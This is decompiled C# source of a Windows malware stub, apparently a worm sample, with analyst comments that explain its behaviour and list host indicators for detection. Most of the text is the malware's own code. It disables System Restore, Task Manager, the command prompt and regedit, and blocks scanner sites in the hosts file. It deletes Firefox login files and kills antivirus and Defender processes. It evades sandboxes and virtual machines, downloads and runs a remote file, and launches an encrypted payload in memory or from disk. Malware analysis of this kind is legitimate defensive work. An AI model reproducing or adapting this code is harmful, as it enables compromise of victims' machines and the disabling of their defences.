// Decompiled with JetBrains decompiler
// Type: BCV5StuB.Form1
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
//
// ANALYST NOTES (added for review; the code below is unchanged decompiler output)
// -----------------------------------------------------------------------------
// This is the main form of a builder-generated "stub". Form1_Load runs as soon as
// the hidden form loads and does everything of interest:
//   1. Reads a blob from the running executable (ResourceReader, not shown on this
//      page) and splits it on the marker string "Blackout" into a settings array.
//   2. Depending on boolean settings, weakens the host: registry policy values,
//      hosts-file entries for scanner sites, deletion of Firefox "signon" files,
//      termination of security-product processes, sandbox/VM checks.
//   3. Optionally downloads and runs a file, drops a second bundled file, shows a
//      message box, and finally runs the main embedded payload either in memory or
//      from %APPDATA%.
//
// Host artefacts visible in this listing (useful for triage and detection):
//   Registry : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
//              HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools
//              HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
//              HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD
//   Files    : <temp>\123.exe, <appdata>\msconfig.exe, <appdata>\msconfig_settings.exe,
//              appended lines in C:\Windows\System32\drivers\etc\hosts
//   Process  : a hidden "REG add ... DisableTaskMgr" child process
//
// Decompiler / extraction artefacts: several locals are declared but never assigned
// (e.g. "IEnumerator enumerator;"), generic type arguments are missing ("List"
// instead of a typed list) and some string literals are empty. The listing is for
// reading, not for compiling.
using BCV5StuB.My;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;

namespace BCV5StuB
{
  [DesignerGenerated]
  public class Form1 : Form
  {
    private IContainer components;
    [AccessedThroughProperty("Label1")]
    private Label _Label1;
    [AccessedThroughProperty("WebBrowser1")]
    private WebBrowser _WebBrowser1;
    [AccessedThroughProperty("Button1")]
    private Button _Button1;
    [AccessedThroughProperty("CheckBox1")]
    private CheckBox _CheckBox1;
    // Temp directory (set in the constructor); used as the drop location for "123.exe".
    private string TPath;
    // Decoded main payload, held as a string and converted back to bytes before use.
    private string filetoinject;
    // Marker that separates the settings fields inside the embedded blob.
    // The constant itself is unused; Form1_Load repeats the literal "Blackout".
    private const string FileFucker = "Blackout";
    // Decoded secondary file written to <appdata>\msconfig_settings.exe.
    private string filetodo;

    // Wires Form1_Load to the Load event, so the behaviour starts without any
    // user interaction once the form is created.
    public Form1()
    {
      this.Load += new EventHandler(this.Form1_Load);
      this.TPath = Path.GetTempPath();
      this.InitializeComponent();
    }

    // Standard designer-generated disposal; no behaviour of interest.
    [DebuggerNonUserCode]
    protected override void Dispose(bool disposing)
    {
      try
      {
        if (!disposing || this.components == null)
          return;
        this.components.Dispose();
      }
      finally
      {
        base.Dispose(disposing);
      }
    }

    // Designer-generated layout with default control names and captions
    // ("Label1", "Button1", ...). The form is hidden in Form1_Load, so these
    // controls are never shown; they are filler, not functionality.
    [DebuggerStepThrough]
    private void InitializeComponent()
    {
      this.Label1 = new Label();
      this.WebBrowser1 = new WebBrowser();
      this.Button1 = new Button();
      this.CheckBox1 = new CheckBox();
      this.SuspendLayout();
      this.Label1.AutoSize = true;
      Label label1_1 = this.Label1;
      Point point1 = new Point(102, 62);
      Point point2 = point1;
      label1_1.Location = point2;
      this.Label1.Name = "Label1";
      Label label1_2 = this.Label1;
      Size size1 = new Size(39, 13);
      Size size2 = size1;
      label1_2.Size = size2;
      this.Label1.TabIndex = 0;
      this.Label1.Text = "Label1";
      WebBrowser webBrowser1_1 = this.WebBrowser1;
      point1 = new Point(169, 62);
      Point point3 = point1;
      webBrowser1_1.Location = point3;
      WebBrowser webBrowser1_2 = this.WebBrowser1;
      size1 = new Size(20, 20);
      Size size3 = size1;
      webBrowser1_2.MinimumSize = size3;
      this.WebBrowser1.Name = "WebBrowser1";
      WebBrowser webBrowser1_3 = this.WebBrowser1;
      size1 = new Size(176, 162);
      Size size4 = size1;
      webBrowser1_3.Size = size4;
      this.WebBrowser1.TabIndex = 1;
      Button button1_1 = this.Button1;
      point1 = new Point(199, 13);
      Point point4 = point1;
      button1_1.Location = point4;
      this.Button1.Name = "Button1";
      Button button1_2 = this.Button1;
      size1 = new Size(75, 23);
      Size size5 = size1;
      button1_2.Size = size5;
      this.Button1.TabIndex = 2;
      this.Button1.Text = "Button1";
      this.Button1.UseVisualStyleBackColor = true;
      this.CheckBox1.AutoSize = true;
      CheckBox checkBox1_1 = this.CheckBox1;
      point1 = new Point(49, 139);
      Point point5 = point1;
      checkBox1_1.Location = point5;
      this.CheckBox1.Name = "CheckBox1";
      CheckBox checkBox1_2 = this.CheckBox1;
      size1 = new Size(81, 17);
      Size size6 = size1;
      checkBox1_2.Size = size6;
      this.CheckBox1.TabIndex = 3;
      this.CheckBox1.Text = "CheckBox1";
      this.CheckBox1.UseVisualStyleBackColor = true;
      this.AutoScaleDimensions = new SizeF(6f, 13f);
      this.AutoScaleMode = AutoScaleMode.Font;
      size1 = new Size(409, 248);
      this.ClientSize = size1;
      this.Controls.Add((Control) this.CheckBox1);
      this.Controls.Add((Control) this.Button1);
      this.Controls.Add((Control) this.WebBrowser1);
      this.Controls.Add((Control) this.Label1);
      this.MaximizeBox = false;
      this.MinimizeBox = false;
      this.Name = nameof (Form1);
      this.Text = nameof (Form1);
      this.ResumeLayout(false);
      this.PerformLayout();
    }

    // VB.NET WithEvents-style accessors generated by the compiler; no logic.
    internal virtual Label Label1
    {
      [DebuggerNonUserCode] get => this._Label1;
      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label1 = value;
    }

    internal virtual WebBrowser WebBrowser1
    {
      [DebuggerNonUserCode] get => this._WebBrowser1;
      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._WebBrowser1 = value;
    }

    internal virtual Button Button1
    {
      [DebuggerNonUserCode] get => this._Button1;
      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Button1 = value;
    }

    internal virtual CheckBox CheckBox1
    {
      [DebuggerNonUserCode] get => this._CheckBox1;
      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._CheckBox1 = value;
    }

    // Entry point of the sample's behaviour. Settings come from the blob split on
    // "Blackout"; the indices used below are:
    //   [1]  message-box text            [2]  show message box (bool)
    //   [3]  encoded main payload        [4]  second argument to rc4.rc4 (presumably the key)
    //   [5]  drop secondary file (bool)  [6]  encoded secondary file
    //   [7]  call usb.usb_sp (bool)      [8]  call rc4.Startup (bool)
    //   [9]  run anti-analysis/AV-kill   [10] download-and-run (bool)
    //   [11] download address            [12] DisableTaskMgr (bool)
    //   [13] delete Firefox signon files [14] DisableCMD (bool)
    //   [15] hosts-file edit (bool)      [16] DisableRegistryTools (bool)
    //   [17] DisableSR (bool)
    // ResourceReader, rc4, usb and RunPE are other types in the assembly and are not
    // shown on this page; statements about them below are hedged accordingly.
    private void Form1_Load(object sender, EventArgs e)
    {
      // Hide the window and its taskbar button so nothing is visible to the user.
      this.Visible = false;
      this.ShowInTaskbar = false;
      bool flag = Form1.is64Bit();
      string[] strArray = Strings.Split(Encoding.Default.GetString(ResourceReader.ReadResource(Application.ExecutablePath)), "Blackout");
      string str1 = strArray[7];
      string str2 = strArray[8];
      string str3 = strArray[9];
      string str4 = strArray[10];
      string address = strArray[11];
      string str5 = strArray[12];
      string str6 = strArray[13];
      string str7 = strArray[14];
      string str8 = strArray[15];
      string str9 = strArray[16];
      // Impairs recovery: sets the System Restore "DisableSR" value. This write is
      // under HKLM and, unlike the DisableCMD write below, is not wrapped in try/catch.
      if (Conversions.ToBoolean(strArray[17]))
        MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", "DisableSR", (object) "1", RegistryValueKind.DWord);
      // Impairs investigation: per-user policy value that blocks regedit.
      if (Conversions.ToBoolean(str9))
        MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableRegistryTools", (object) "1", RegistryValueKind.DWord);
      // Appends loopback entries for four online scanner / vendor sites to the hosts
      // file. The path is hard-coded to C:\Windows; the writer is opened in append mode.
      // Unexpected 127.0.0.1 entries for these host names are a simple host indicator.
      if (Conversions.ToBoolean(str8))
      {
        StreamWriter streamWriter = new StreamWriter("C:\\Windows\\System32\\drivers\\etc\\hosts", true);
        string str10 = "\n 127.0.0.1 www.virustotal.com";
        string str11 = "\n 127.0.0.1 www.bitdefender.com";
        string str12 = "\n 127.0.0.1 www.virusscan.jotti.org";
        string str13 = "\n 127.0.0.1 www.scanner.novirusthanks.org";
        streamWriter.Write(str10);
        streamWriter.Write("\r\n" + str11);
        streamWriter.Write("\r\n" + str12);
        streamWriter.Write("\r\n" + str13);
        streamWriter.Close();
      }
      // Per-user policy value that disables the command prompt; errors are swallowed.
      if (Conversions.ToBoolean(str7))
      {
        try
        {
          MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", (object) "1", RegistryValueKind.DWord);
        }
        catch (Exception ex)
        {
          ProjectData.SetProjectError(ex);
          ProjectData.ClearProjectError();
        }
      }
      // Walks every Firefox profile directory of the current user and deletes files
      // whose path contains "signon". In the code shown this is deletion only;
      // nothing is read or sent anywhere.
      if (Conversions.ToBoolean(str6))
      {
        string str14 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles";
        if (Directory.Exists(str14))
        {
          try
          {
            foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str14))
            {
              try
              {
                foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory))
                {
                  if (file.Contains("signon"))
                  {
                    try
                    {
                      MyProject.Computer.FileSystem.DeleteFile(file);
                    }
                    catch (Exception ex)
                    {
                      ProjectData.SetProjectError(ex);
                      ProjectData.ClearProjectError();
                    }
                  }
                }
              }
              finally
              {
                // Decompiler artefact: the enumerator local is never assigned here.
                IEnumerator enumerator;
                enumerator?.Dispose();
              }
            }
          }
          finally
          {
            // Decompiler artefact, same as above.
            IEnumerator enumerator;
            enumerator?.Dispose();
          }
        }
      }
      // Disables Task Manager by spawning a hidden "REG add" process rather than using
      // the registry API. The command line is a convenient process-creation indicator.
      if (Conversions.ToBoolean(str5))
      {
        try
        {
          Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", AppWinStyle.Hide);
        }
        catch (Exception ex)
        {
          ProjectData.SetProjectError(ex);
          ProjectData.ClearProjectError();
        }
      }
      // usb.usb_sp is not shown; given the AutoRun family label in the sample path it is
      // presumably the removable-media spreading routine. Confirm against the usb type.
      if (Conversions.ToBoolean(str1))
        usb.usb_sp();
      // Remove a stale download from a previous run before (optionally) fetching again.
      if (MyProject.Computer.FileSystem.FileExists(this.TPath + "123.exe"))
        MyProject.Computer.FileSystem.DeleteFile(this.TPath + "123.exe");
      // Downloader: fetches the configured address to <temp>\123.exe and executes it.
      // No integrity check is performed on the downloaded file in the code shown.
      if (Conversions.ToBoolean(str4))
      {
        MyProject.Computer.Network.DownloadFile(address, this.TPath + "123.exe");
        Process.Start(this.TPath + "123.exe");
      }
      // rc4.Startup is not shown; the name suggests a persistence routine. Confirm.
      if (Conversions.ToBoolean(str2))
        rc4.Startup();
      // Anti-analysis checks (mofo) followed by the per-product process killers.
      if (Conversions.ToBoolean(str3))
      {
        Form1.mofo();
        Form1.AntiAntiGen();
        Form1.AntiAsquared();
        Form1.AntiAvast();
        Form1.AntiAVG();
        Form1.AntiBullGuard();
        Form1.AntiClamAV();
        Form1.AntiComodo();
        Form1.AntiEstNod32();
        Form1.AntiEwido();
        Form1.AntiFPROT6();
        Form1.AntiKaspersky();
        Form1.AntiMcAfee();
        Form1.AntiNorton();
        Form1.AntiOfficeScan();
        Form1.AntiOutPost();
        Form1.AntiPCCillin();
        Form1.AntiServerProtect();
        Form1.AntiSpySweeper();
        Form1.AntiThreatExpert();
        Form1.AntiVirtualPC();
        Form1.AntiZoneAlarm();
      }
      // Secondary file: decoded with rc4.rc4, written with the legacy VB file API to
      // <appdata>\msconfig_settings.exe and started. The file name imitates a Windows tool.
      if (Conversions.ToBoolean(strArray[5]))
      {
        this.filetodo = rc4.rc4(strArray[6], strArray[4]);
        string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
        FileSystem.FileOpen(5, folderPath + "\\msconfig_settings.exe", OpenMode.Binary, OpenAccess.ReadWrite);
        FileSystem.FilePut(5, this.filetodo, -1L, false);
        FileSystem.FileClose(5);
        Process.Start(folderPath + "\\msconfig_settings.exe");
      }
      // Optional message box with builder-supplied text (typically a fake error).
      if (Conversions.ToBoolean(strArray[2]))
      {
        int num = (int) Interaction.MsgBox((object) strArray[1]);
      }
      // Main payload launch. Two strategies appear: in-memory load through runit when
      // ScanForDotNet() is true, otherwise drop to <appdata>\msconfig.exe and start it
      // (or, on the non-64-bit path, try RunPE first and fall back to the drop).
      if (flag)
      {
        try
        {
          // NOTE(analyst): in the code shown, filetoinject has not been assigned yet on
          // this path when ScanForDotNet() reads it, so the catch below (which exits the
          // process) looks like the likely outcome. Confirm dynamically.
          if (this.ScanForDotNet())
          {
            Thread thread = new Thread((ParameterizedThreadStart) (a0 => this.runit(Conversions.ToString(a0))));
            thread.TrySetApartmentState(ApartmentState.STA);
            thread.Start((object) this.filetoinject);
            this.Close();
          }
          else
          {
            this.filetoinject = rc4.rc4(strArray[3], strArray[4]);
            string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            FileSystem.FileOpen(5, folderPath + "\\msconfig.exe", OpenMode.Binary, OpenAccess.ReadWrite);
            FileSystem.FilePut(5, this.filetoinject, -1L, false);
            FileSystem.FileClose(5);
            Process.Start(folderPath + "\\msconfig.exe");
          }
        }
        catch (Exception ex)
        {
          ProjectData.SetProjectError(ex);
          Environment.Exit(0);
          ProjectData.ClearProjectError();
        }
      }
      else
      {
        this.filetoinject = rc4.rc4(strArray[3], strArray[4]);
        // Result discarded; this statement has no effect.
        Encoding.Default.GetBytes(this.filetoinject);
        if (this.ScanForDotNet())
        {
          Thread thread = new Thread((ParameterizedThreadStart) (a0 => this.runit(Conversions.ToString(a0))));
          thread.TrySetApartmentState(ApartmentState.STA);
          thread.Start((object) this.filetoinject);
          this.Close();
        }
        else
        {
          try
          {
            // RunPE is not shown. It receives the payload bytes and the path of the
            // current executable; the name suggests the payload is run inside a new
            // instance of that executable. Confirm against the RunPE type.
            new RunPE().SRexec(Encoding.Default.GetBytes(this.filetoinject), Process.GetCurrentProcess().MainModule.FileName);
          }
          catch (Exception ex1)
          {
            ProjectData.SetProjectError(ex1);
            // Fallback: write the payload to disk and start it as a normal process.
            try
            {
              this.filetoinject = rc4.rc4(strArray[3], strArray[4]);
              string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
              FileSystem.FileOpen(5, folderPath + "\\msconfig.exe", OpenMode.Binary, OpenAccess.ReadWrite);
              FileSystem.FilePut(5, this.filetoinject, -1L, false);
              FileSystem.FileClose(5);
              Process.Start(folderPath + "\\msconfig.exe");
            }
            catch (Exception ex2)
            {
              ProjectData.SetProjectError(ex2);
              Environment.Exit(0);
              ProjectData.ClearProjectError();
            }
            ProjectData.ClearProjectError();
          }
        }
      }
    }

    // Treats the host as 64-bit when the ProgramW6432 environment variable is non-empty.
    public static bool is64Bit() => Operators.CompareString(Environment.GetEnvironmentVariable("ProgramW6432"), "", false) != 0;

    // Closes the given form and ends the application when the form's title contains
    // "#". The label/goto/switch scaffolding looks like the state machine the
    // decompiler produces for VB.NET "On Error Resume Next"; it is not hand-written
    // logic. This overload is not called anywhere in the code shown.
    public static void AntiSandboxie(Form frmSelect)
    {
      label_0:
      int num1;
      int num2;
      try
      {
        ProjectData.ClearProjectError();
        num1 = -2;
        label_1:
        int num3 = 2;
        if (!frmSelect.Text.Contains("#"))
          goto label_9;
        label_2:
        num3 = 3;
        frmSelect.Close();
        ProjectData.EndApp();
        goto label_9;
        label_4:
        num2 = num3;
        switch (num1 > -2 ? num1 : 1)
        {
          case 1:
            int num4 = num2 + 1;
            num2 = 0;
            switch (num4)
            {
              case 1:
                goto label_0;
              case 2:
                goto label_1;
              case 3:
                goto label_2;
              case 4:
              case 5:
              case 6:
                goto label_9;
            }
            break;
        }
      }
      catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
      {
        ProjectData.SetProjectError(ex);
        goto label_4;
      }
      throw ProjectData.CreateProjectError(-2146828237);
      label_9:
      if (num2 == 0)
        return;
      ProjectData.ClearProjectError();
    }

    // ---------------------------------------------------------------------------
    // Security-product process killers.
    // Every Anti<Product> routine below has the same shape: enumerate all processes,
    // lower-case each process name with Strings.LCase, compare it for exact equality
    // with one hard-coded literal, and call Kill() on a match. Kill() is not guarded,
    // so an access-denied error propagates to the caller (Form1_Load has no handler
    // around these calls).
    // The literals are the useful part for defenders: they list the process names the
    // builder's author intended to target. Literals that contain upper-case letters,
    // a ".exe" suffix or several names fused together cannot equal a lower-cased
    // process name, so those routines are ineffective as written; this is noted on
    // each one.
    // ---------------------------------------------------------------------------

    // Target literal: "mcagentmcuimgr" (looks like two names fused together;
    // unlikely to equal any single process name).
    public static void AntiMcAfee()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "mcagentmcuimgr", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "avgemc".
    public static void AntiAVG()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "avgemc", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "a2servic".
    public static void AntiAsquared()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "a2servic", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Loads the given bytes as a .NET assembly inside the current process and invokes
    // its entry point with a single string argument "1". Nothing is written to disk on
    // this path, so file-based scanning does not see the payload; detection has to
    // rely on in-memory assembly-load telemetry or on the behaviour of the payload.
    private void RunFromMemory(byte[] bytes)
    {
      Assembly assembly = Assembly.Load(bytes);
      MethodInfo entryPoint = assembly.EntryPoint;
      object objectValue = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name))));
      entryPoint.Invoke(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(objectValue))), new object[1]
      {
        (object) new string[1]{ "1" }
      });
    }

    // Converts the payload string back to bytes using code page 1252 and runs
    // RunFromMemory on a new STA thread, then closes the form.
    // Note that Form1_Load decodes the resource with Encoding.Default, not 1252;
    // the two only agree on systems whose ANSI code page is 1252.
    public void runit(string split)
    {
      byte[] bytes = Encoding.GetEncoding(1252).GetBytes(split);
      Thread thread = new Thread((ParameterizedThreadStart) (a0 => this.RunFromMemory((byte[]) a0)));
      thread.TrySetApartmentState(ApartmentState.STA);
      thread.Start((object) bytes);
      this.Close();
    }

    // Decides whether the payload is handled as a .NET assembly (in-memory load) or
    // not. NOTE(analyst): the three string literals are empty in this listing, which
    // is presumably an extraction loss (non-printable or markup-like characters), so
    // the actual marker being searched for cannot be recovered from this page.
    // "flag" is an unassigned decompiler local.
    private bool ScanForDotNet()
    {
      if (!this.filetoinject.Contains(""))
        return false;
      bool flag;
      return Operators.CompareString(Strings.Split(this.filetoinject, "")[1].ToLower(), "", false) != 0 || flag;
    }

    // Target literal: "ashWebSv" (mixed case; cannot equal a lower-cased name).
    public static void AntiAvast()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ashWebSv", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "clamauto".
    public static void AntiClamAV()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "clamauto", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "cpf".
    public static void AntiComodo()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "cpf", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "ewido".
    public static void AntiEwido()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ewido", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "FPAVServer" (mixed case; cannot equal a lower-cased name).
    public static void AntiFPROT6()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "FPAVServer", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "kavsvc".
    public static void AntiKaspersky()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "kavsvc", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "BullGuard" (mixed case; cannot equal a lower-cased name).
    public static void AntiBullGuard()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "BullGuard", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "VSMON" (upper case; cannot equal a lower-cased name).
    public static void AntiZoneAlarm()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "VSMON", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "antigen".
    public static void AntiAntiGen()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "antigen", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "ccapp".
    public static void AntiNorton()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ccapp", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "tmlisten".
    public static void AntiOfficeScan()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "tmlisten", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "pccntmon".
    public static void AntiPCCillin()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "pccntmon", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "earthagent".
    public static void AntiServerProtect()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "earthagent", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "spysweeper".
    public static void AntiSpySweeper()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "spysweeper", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "vpcmapvmsrvc" (looks like two names fused together).
    // Unlike the environment checks in mofo(), this routine kills a process rather
    // than exiting.
    public static void AntiVirtualPC()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "vpcmapvmsrvc", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "acs.exe" (Process.ProcessName carries no ".exe" suffix, so this
    // comparison is not expected to match).
    public static void AntiOutPost()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "acs.exe", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // Target literal: "nod32.exenod32krn.exeekrn.exe" (three file names fused into one
    // string; not expected to match any process name).
    public static void AntiEstNod32()
    {
      Process[] processes = Process.GetProcesses();
      int num = checked (processes.Length - 1);
      int index = 0;
      while (index <= num)
      {
        if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "nod32.exenod32krn.exeekrn.exe", false) == 0)
          processes[index].Kill();
        checked { ++index; }
      }
    }

    // VB6-style declaration of user32!FindWindowA. The return type is declared as a
    // 64-bit long, whereas the native function returns a window handle; only IsVmWare
    // uses it.
    [DllImport("user32", EntryPoint = "FindWindowA", CharSet = CharSet.Ansi, SetLastError = true)]
    private static extern long FindWindow([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpClassName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpWindowName);

    // Runs the environment checks and the two Windows Defender process kills.
    // Several of these checks call Environment.Exit(0), so in an analysis environment
    // that trips one of them the sample ends here, after the registry/hosts/download
    // actions in Form1_Load but before the main payload is launched.
    public static void mofo()
    {
      Form1.seekit("MSASCui");
      Form1.seekit("msmpeng");
      Form1.AntiSandboxie();
      Form1.IsVmWare();
      Form1.AntiThreatExpert();
      Form1.checkUsername();
      Form1.checkComputername();
    }

    // Kills every process whose name contains the given substring (case-sensitive
    // String.Contains); failures to kill are swallowed.
    private static void seekit(string gay1)
    {
      Process[] processes = Process.GetProcesses();
      int index = 0;
      while (index < processes.Length)
      {
        Process process = processes[index];
        if (process.ProcessName.Contains(gay1))
        {
          try
          {
            process.Kill();
          }
          catch (Exception ex)
          {
            ProjectData.SetProjectError(ex);
            ProjectData.ClearProjectError();
          }
        }
        checked { ++index; }
      }
    }

    // Exits when the current user name exactly equals one of a short list of names
    // associated with analysis machines. "User" appears twice in the list.
    // The untyped "List" and the unassigned enumerator are decompiler/extraction
    // artefacts.
    private static void checkUsername()
    {
      List stringList = new List();
      stringList.Add("UserName");
      stringList.Add("User");
      stringList.Add("honey");
      stringList.Add("sandbox");
      stringList.Add("currentuser");
      stringList.Add("User");
      try
      {
        foreach (string Right in stringList)
        {
          if (Operators.CompareString(Environment.UserName, Right, false) == 0)
            Environment.Exit(0);
        }
      }
      finally
      {
        List.Enumerator enumerator;
        enumerator.Dispose();
      }
    }

    // Exits when the machine name exactly equals one of the listed host names
    // (presumably names of known public sandboxes; the listing does not say which).
    private static void checkComputername()
    {
      List stringList = new List();
      stringList.Add("ComputerName");
      stringList.Add("COMPUTERNAME");
      stringList.Add("DELL-D3E62F7E26");
      stringList.Add("DWI-9625AC2E275");
      stringList.Add("MICHAEL-F156CF7");
      try
      {
        foreach (string Right in stringList)
        {
          if (Operators.CompareString(Environment.MachineName, Right, false) == 0)
            Environment.Exit(0);
        }
      }
      finally
      {
        List.Enumerator enumerator;
        enumerator.Dispose();
      }
    }

    // Exits when a process named "SbieSvc" (the Sandboxie service) is running.
    public static void AntiSandboxie()
    {
      if (Process.GetProcessesByName("SbieSvc").Length < 1)
        return;
      Environment.Exit(0);
    }

    // Looks for a top-level window of class "VMDragDetectWndClass".
    // NOTE(analyst): as decompiled, the method returns when the window IS found and
    // exits the process when it is NOT found, which is the opposite of what the name
    // implies. Confirm against the IL before relying on either reading.
    public static void IsVmWare()
    {
      string str1 = "VMDragDetectWndClass";
      ref string local1 = ref str1;
      string str2 = (string) null;
      ref string local2 = ref str2;
      if (Form1.FindWindow(ref local1, ref local2) != 0L)
        return;
      Environment.Exit(0);
    }

    // Exits when the path of the running executable contains "sample"
    // (case-sensitive), a common naming convention on automated analysis systems.
    private static void AntiThreatExpert()
    {
      if (!Process.GetCurrentProcess().MainModule.FileName.Contains("sample"))
        return;
      Environment.Exit(0);
    }
  }
}